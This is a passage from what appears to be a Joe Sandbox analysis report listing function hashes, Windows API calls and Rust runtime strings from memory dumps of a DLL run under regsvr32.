                                                                              • Opcode Fuzzy Hash: 460b3c56792f714b2b64b372c89636ddea5141116f8c9640e3532d37db9afe77
                                                                              • Instruction Fuzzy Hash: EA129272B0CA8181EA648B11E4A03BBA761F786BD4F484135EF9D87B99DF7DD085E700
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Handle$CloseFile$CreateErrorInformationLastMappingView
                                                                              • String ID:
                                                                              • API String ID: 2964106993-0
                                                                              • Opcode ID: 329a859258352fc628ac220aeebcf9b742e7edc0c93e4ac97ebe432fb47f10f6
                                                                              • Instruction ID: ca70b15eb781da0d39f83b0522c1ae90e1d2f5df9b901359730ef0158819fbe6
                                                                              • Opcode Fuzzy Hash: 329a859258352fc628ac220aeebcf9b742e7edc0c93e4ac97ebe432fb47f10f6
                                                                              • Instruction Fuzzy Hash: CA61B622B0974289FB64DB62E4A47BD67A0BB4AB84F18803DDF4C47B89DF3DD1459720
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Value$AddressErrorLastWait
                                                                              • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs
                                                                              • API String ID: 1881407604-459553403
                                                                              • Opcode ID: 8c95363bd5908af043f7bdf41a3a67bd6db56fe1e390a2f2022aec965efde82a
                                                                              • Instruction ID: 5aa0bd090a063d2f55c696dc2823fb0295b0e8048f9eb2e4faeeac76566affca
                                                                              • Opcode Fuzzy Hash: 8c95363bd5908af043f7bdf41a3a67bd6db56fe1e390a2f2022aec965efde82a
                                                                              • Instruction Fuzzy Hash: 25515523F0994245FA2A9B2188A16BD17549F4BB94F44863ADF0DC7BC9DD2CF502E320
                                                                              APIs
                                                                              • TlsGetValue.KERNEL32(?,?,?,00007FFD34936EA1,?,?,?,?,?,00007FFD3493622F), ref: 00007FFD349510A4
                                                                              • TlsGetValue.KERNEL32(?,?,?,00007FFD34936EA1,?,?,?,?,?,00007FFD3493622F), ref: 00007FFD3495110E
                                                                              • TlsSetValue.KERNEL32(?,?,?,00007FFD34936EA1,?,?,?,?,?,00007FFD3493622F), ref: 00007FFD3495111E
                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FFD34936EA1,?,?,?,?,?,00007FFD3493622F), ref: 00007FFD349511A2
                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FFD34936EA1,?,?,?,?,?,00007FFD3493622F), ref: 00007FFD349511C6
                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FFD34936EA1,?,?,?,?,?,00007FFD3493622F), ref: 00007FFD34951219
                                                                              • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FFD34936EA1,?,?,?,?,?,00007FFD3493622F), ref: 00007FFD34951226
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID:
                                                                              • API String ID: 3702945584-0
                                                                              • Opcode ID: d4ae1a0229a8d65e4ecdf0e2dfab48198e18f5a9625158b37e5ce865928e9b4b
                                                                              • Instruction ID: 7276b97cb9a3b4d4ba45ca079c26c6ba6098511b6bfd586ca0b3023f93b86234
                                                                              • Opcode Fuzzy Hash: d4ae1a0229a8d65e4ecdf0e2dfab48198e18f5a9625158b37e5ce865928e9b4b
                                                                              • Instruction Fuzzy Hash: 55513722F0829242FB956B2585F17795691AF8BB90F58407CDF0DC77CEDE2CE841A320
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy
                                                                              • String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY$assertion failed: old_left_len + count <= CAPACITY
                                                                              • API String ID: 3510742995-3535459961
                                                                              • Opcode ID: f7f27ac28c4b16b16920d61e5c4defb40cd3188e683d96eddf09850372c62890
                                                                              • Instruction ID: 9898e8253ecf45cb1d460ba5abc8a70d574f3e8d8868f68d68cafe96b6ce99ab
                                                                              • Opcode Fuzzy Hash: f7f27ac28c4b16b16920d61e5c4defb40cd3188e683d96eddf09850372c62890
                                                                              • Instruction Fuzzy Hash: D2917C36A04B8585E7218F25E8903E937A4FB6978CF548226DF8C47769EF39D296D300
                                                                              APIs
                                                                              • GetOverlappedResult.KERNEL32(00000000,?,00000000,?,00007FFD348FDAD4,?,00000000,?,00007FFD3493FB7A), ref: 00007FFD3493FED1
                                                                              • GetLastError.KERNEL32(00000000,?,00000000,?,00007FFD348FDAD4,?,00000000,?,00007FFD3493FB7A), ref: 00007FFD3493FEEE
                                                                              • GetLastError.KERNEL32(00000000,?,00000000,?,00007FFD348FDAD4,?,00000000,?,00007FFD3493FB7A), ref: 00007FFD3493FF4C
                                                                              • CompareStringOrdinal.KERNEL32 ref: 00007FFD3493FFB9
                                                                              • GetLastError.KERNEL32 ref: 00007FFD3493FFCE
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CompareOrdinalOverlappedResultString
                                                                              • String ID:
                                                                              • API String ID: 1037094402-0
                                                                              • Opcode ID: 98225aa486125f3992f5ae86c0801459f2f2be32f69704ad7066ced77101df77
                                                                              • Instruction ID: 5d0cf4b077e2b364d1d6eaa9c960311dfe384be7b1255685b716458fa453fddb
                                                                              • Opcode Fuzzy Hash: 98225aa486125f3992f5ae86c0801459f2f2be32f69704ad7066ced77101df77
                                                                              • Instruction Fuzzy Hash: 5A417032B04B418AE7649B2194A43B923A0FB4BB84F544539EF4C87B9ADF7CE5819350
                                                                              APIs
                                                                              • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFD34951155,?,?,?), ref: 00007FFD3494AEE3
                                                                              • InitOnceComplete.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFD34951155,?,?,?), ref: 00007FFD3494AF2E
                                                                              Strings
                                                                              • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FFD3494B0E8
                                                                              • assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FFD3494B0D0
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AllocCompleteInitOnce
                                                                              • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
                                                                              • API String ID: 622421136-3544120690
                                                                              • Opcode ID: d77c9fe3a3a32cc8cb26f478ae6ecd6ca26f3f1949eee488450d6aff91ecd503
                                                                              • Instruction ID: 33b4283598e29218228643c05af396fb83c4d9fe5086e4a26149d2ee2faf66cb
                                                                              • Opcode Fuzzy Hash: d77c9fe3a3a32cc8cb26f478ae6ecd6ca26f3f1949eee488450d6aff91ecd503
                                                                              • Instruction Fuzzy Hash: 6271B172B086518AE750CF25D4A03AC37A0FB46758F648139DB5C87799DF3CE986E350
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaise
                                                                              • String ID: CCG $TSUR$TSUR
                                                                              • API String ID: 3997070919-4029986600
                                                                              • Opcode ID: d66089138772ed3cedeb24aaac314386af247d355a02903a316bb21e55e8ba46
                                                                              • Instruction ID: 0688848c939705680f09ef398b8ea5fcfa08e02e69caa0c0587c89049c5d45e9
                                                                              • Opcode Fuzzy Hash: d66089138772ed3cedeb24aaac314386af247d355a02903a316bb21e55e8ba46
                                                                              • Instruction Fuzzy Hash: 7E31D422F28B8182E6149B5598602B82760FBDAB84F55D235EF4C437A5EF3CA1E5D300
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$memset
                                                                              • String ID:
                                                                              • API String ID: 438689982-0
                                                                              • Opcode ID: 3aedab875b8193aed7cd6fea5d00ec98f7dbc198fe5ac9187d3644abe5d82689
                                                                              • Instruction ID: 4311bc6bf8c056da41ba3633a65acf0ca20acf6edaa714a3616e76acba3fa74b
                                                                              • Opcode Fuzzy Hash: 3aedab875b8193aed7cd6fea5d00ec98f7dbc198fe5ac9187d3644abe5d82689
                                                                              • Instruction Fuzzy Hash: 3D12E01360D3C08AE36A9739A0683AFBFA197533A4F080165D7F94B6C7CB6DE049D761
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .Components$assertion failed: is_code_point_boundary(self, new_len)$exe\\.\NULexit code:
                                                                              • API String ID: 0-953524122
                                                                              • Opcode ID: 3a0f5517ff7dc646103a699e0bdc61b01a876fcb8306fa10a33713901dca25c7
                                                                              • Instruction ID: a999914a308b51299ffa72b4e8c4ea6ba9f22de6c3c62ab6db4e4251f2ce7cff
                                                                              • Opcode Fuzzy Hash: 3a0f5517ff7dc646103a699e0bdc61b01a876fcb8306fa10a33713901dca25c7
                                                                              • Instruction Fuzzy Hash: EFB1F361F09B4A45FE15CB6198B07B927A1AF06BD8F544439CF0D8779DEE3CE541A320
                                                                              APIs
                                                                              • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,00000000,00000230,00007FFD34945014), ref: 00007FFD34948EE1
                                                                              • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,00000000,00000230,00007FFD34945014), ref: 00007FFD34949070
                                                                              • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,00000000,00000230,00007FFD34945014), ref: 00007FFD34949127
                                                                                • Part of subcall function 00007FFD3496F690: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FFD3496F81F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy
                                                                              • String ID: program path has no file name
                                                                              • API String ID: 3510742995-697003637
                                                                              • Opcode ID: 123ca9ac5f42895badec97bf67f0e338ef840c4c182f4f80b8e57447b2a3d17f
                                                                              • Instruction ID: b00f0cfda8d6838ecc18f9751953f17ed10892a98648ae29a78d1cb5e39309ee
                                                                              • Opcode Fuzzy Hash: 123ca9ac5f42895badec97bf67f0e338ef840c4c182f4f80b8e57447b2a3d17f
                                                                              • Instruction Fuzzy Hash: 6DA1E066F0875145EB20CB21C8A47BD6665BB1ABD8F448539CF0C9BB8DDB7CE142A310
                                                                              APIs
                                                                              Strings
                                                                              • attempt to join into collection with len > usize::MAX/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\str.rs, xrefs: 00007FFD348EAF56
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy
                                                                              • String ID: attempt to join into collection with len > usize::MAX/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\str.rs
                                                                              • API String ID: 3510742995-1099963043
                                                                              • Opcode ID: f0680589d23a676cad86601119c5e944e716e4d08ba026eb8025f52c18701fa4
                                                                              • Instruction ID: cd2e9017f55d3c815f0c95029dd02ff09133dfee2c6fb6edb570cc4cbdcd7287
                                                                              • Opcode Fuzzy Hash: f0680589d23a676cad86601119c5e944e716e4d08ba026eb8025f52c18701fa4
                                                                              • Instruction Fuzzy Hash: 7281A572B09B4581EA14DB1AE5903BAA790FB56BC4F588135DF8D87799DF3CE081D340
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaise
                                                                              • String ID: CCG $TSUR
                                                                              • API String ID: 3997070919-2088351922
                                                                              • Opcode ID: 08c81c435b80b6055334b3464508a2c04ce1d22763f75db641e90fc4fdac8e10
                                                                              • Instruction ID: be9e13b5233fc7ed75ed723c9c41ed3e4a4f0a58e46ccf4c86cd870d91a801a3
                                                                              • Opcode Fuzzy Hash: 08c81c435b80b6055334b3464508a2c04ce1d22763f75db641e90fc4fdac8e10
                                                                              • Instruction Fuzzy Hash: D3419E22F14A4186E7109B61D8A13BD2760FB8AB88F548239DF4D43769EF3CE195D310
                                                                              APIs
                                                                              • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,00007FFD349362E2), ref: 00007FFD3494AA5C
                                                                              • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FFD349362E2), ref: 00007FFD3494AAB8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressSingleValueWake
                                                                              • String ID: assertion failed: is_unlocked(state)
                                                                              • API String ID: 741412973-3502192491
                                                                              • Opcode ID: 58a50d01614f9108a191bc0430b0e6a8b6e02b84c7114ead86d0bc0e6bf030e3
                                                                              • Instruction ID: 8257ca2985d4fa75e1adaf5f1c58cf731001b8f423ccb0f42d4db0a240dd2b9e
                                                                              • Opcode Fuzzy Hash: 58a50d01614f9108a191bc0430b0e6a8b6e02b84c7114ead86d0bc0e6bf030e3
                                                                              • Instruction Fuzzy Hash: 6E21C721F4A4128AF716961995913BA2292DBDA71CF68C038DB0D873D9DD3CDC83E790
                                                                              APIs
                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFD34936EA1), ref: 00007FFD34951292
                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFD34936EA1), ref: 00007FFD349512F3
                                                                              • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFD34936EA1), ref: 00007FFD34951303
                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFD34936EA1), ref: 00007FFD34951352
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID:
                                                                              • API String ID: 3702945584-0
                                                                              • Opcode ID: 19f2db0584bc921d2f48c441bbdb5c836b78b3af768a83a49f31d08f8975ad49
                                                                              • Instruction ID: b93d62b907f6280d5acc859c359149a42fae7667196c6040276fac324f92e3f3
                                                                              • Opcode Fuzzy Hash: 19f2db0584bc921d2f48c441bbdb5c836b78b3af768a83a49f31d08f8975ad49
                                                                              • Instruction Fuzzy Hash: 8631CF22F0D61252FE555B1195B23BD22A1AF8AB80F5C4479DF4DC7BDADE2CA801A360
                                                                              APIs
                                                                              Memory Dump Source
